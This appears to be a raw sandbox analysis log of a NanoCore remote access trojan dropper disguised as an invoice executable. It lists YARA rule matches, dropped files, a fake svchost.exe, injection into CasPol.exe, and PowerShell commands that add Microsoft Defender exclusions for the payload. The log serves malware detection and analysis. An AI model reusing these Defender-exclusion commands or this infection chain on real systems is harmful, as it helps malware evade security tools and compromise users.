      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: invalid certificate
      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: CN-Invoice-XXXXX9808-19011143287989.exeBinary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687564149.0000000006CD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1531945645.0000000001680000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1659012129.0000000004E4B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000000.1082949898.0000000000F72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVqjVGinN.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1686201376.0000000006280000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687898463.0000000006EF0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1687898463.0000000006EF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRTaw OCs.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287989.exe
      Source: 00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000012.00000002.1641837580.00000000052A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.52a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.52a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.5540000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 18.2.CasPol.exe.3dfb146.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 18.2.CasPol.exe.5540000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.CN-Invoice-XXXXX9808-19011143287989.exe.44c0e30.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1529251324.00000000015E8000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb)
      Source: classification engineClassification label: mal100.troj.evad.winEXE@40/21@6/5
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\RiXHGNhjFJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{5c958888-f81c-42a4-939d-31983a2cd9ba}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3032:120:WilError_01
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3236
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1cJump to behavior
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: CN-Invoice-XXXXX9808-19011143287989.exeReversingLabs: Detection: 29%
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /SpecialRun 4101d8 4716
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236
      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 2232
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe'
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
